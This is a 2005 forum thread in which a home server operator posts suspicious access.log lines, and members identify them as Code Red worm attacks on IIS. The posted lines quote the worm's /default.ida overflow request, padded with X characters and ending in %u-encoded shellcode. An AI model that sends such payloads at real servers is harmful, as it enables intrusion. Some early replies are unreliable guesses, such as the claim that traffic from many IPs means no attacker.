Jump to content


Photo

Strange entries into access.log


  • Please log in to reply
7 replies to this topic

#1 gopo

gopo

    Newbie

  • Member
  • Pip
  • 9 posts

Posted 23 March 2005 - 03:28 PM

Hi guys,

I have no idea if this is the place to ask, so you'll have to forgive me.
I'm hosting my domain with my computer and uniformServer as... server.

Today while reading access.log (just pure curiosrity) I observed some really strange entries into the log. If necessary I can post all entries I'm talking about, but for now I will just post a fragment.
I can see in the error.log that the requests are treated either as "File does not exist" or "URI too long". Never the less, is someone trying to atack the server or what?
Here's a fragment:

>> 211.158.113.35 - - [23/Mar/2005:20:02:10 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u
00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323

>> 222.91.35.92 - - [23/Mar/2005:20:10:49 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%
u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323

>>216.251.92.99 - - [23/Mar/2005:20:18:30 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323


There are few some are really really long, looking like "x90\x02\xb1\x02\xb1\x".

Any ideas? Do you know what deault.ida might be? There is no such file on my server.

#2 olajideolaolorun

olajideolaolorun

    Project Manager

  • Admin
  • PipPipPipPipPip
  • 2,347 posts
  • Gender:Male
  • Location:Atlanta, GA
  • SourceForge IDempirex
  • Wiki ID: olajideolaolorun
  • IRC Nickname: Olajide
  • Main OS: Windows 10

Posted 23 March 2005 - 10:54 PM

Hmm.. It could be a hacker or a bot. It may also not be it if it is occuring from different IPs. If it is happening from different IPs, then it is not a hacker, but could be a search bot or something like that...

#3 olajideolaolorun

olajideolaolorun

    Project Manager

  • Admin
  • PipPipPipPipPip
  • 2,347 posts
  • Gender:Male
  • Location:Atlanta, GA
  • SourceForge IDempirex
  • Wiki ID: olajideolaolorun
  • IRC Nickname: Olajide
  • Main OS: Windows 10

Posted 23 March 2005 - 10:58 PM

The IP you used to post this topic refers to Google... hmm...

"...out of ideas..." :D :) :)

#4 AlleyKat

AlleyKat

    Project Helper

  • Super Moderator
  • PipPip
  • 84 posts
  • Location:Odense, Denmark
  • SourceForge IDdk_alleykat
  • IRC Nickname: (@)AlleyKat :P

Posted 24 March 2005 - 12:12 AM

Except for the file name it rather looks like the Santy-worm that attacks phpBB boards - my guess is that those are hacking attempts, from either an actual hacker or from hacked PCs.

#5 AlleyKat

AlleyKat

    Project Helper

  • Super Moderator
  • PipPip
  • 84 posts
  • Location:Odense, Denmark
  • SourceForge IDdk_alleykat
  • IRC Nickname: (@)AlleyKat :P

Posted 24 March 2005 - 12:13 AM

http://www.thesitewi...rediiworm.shtml

Its CodeRed worm attacks.

#6 olajideolaolorun

olajideolaolorun

    Project Manager

  • Admin
  • PipPipPipPipPip
  • 2,347 posts
  • Gender:Male
  • Location:Atlanta, GA
  • SourceForge IDempirex
  • Wiki ID: olajideolaolorun
  • IRC Nickname: Olajide
  • Main OS: Windows 10

Posted 24 March 2005 - 07:10 AM

Wow.... :D learning something new everyday.. :) seems like it is only unsafe for IIS LOL

#7 kermit

kermit

    Newbie

  • Member
  • Pip
  • 6 posts

Posted 08 May 2005 - 02:43 PM

you should see my server logs... omfg, they're full of crap like that..

i dont care so much about those, that's what debian and apache are for. B)

but the scumbags who work for the riaa and their web crawlers that disobey or ignore robots.txt, and hammer away at a site as fast as they can.. i have a nifty, slow-loading, little infinite bot trap black hole for them, and the worst ones get filtered at the firewall instead. am looking at a dynamic robots.txt though, i saw a site that has an example in perl, it's pretty sweet.. ahh, here it is.. a little outdated, but it gives me a place to start... http://www.leekillough.com/robots.html

#8 olajideolaolorun

olajideolaolorun

    Project Manager

  • Admin
  • PipPipPipPipPip
  • 2,347 posts
  • Gender:Male
  • Location:Atlanta, GA
  • SourceForge IDempirex
  • Wiki ID: olajideolaolorun
  • IRC Nickname: Olajide
  • Main OS: Windows 10

Posted 08 May 2005 - 04:51 PM

Not bad B)




1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users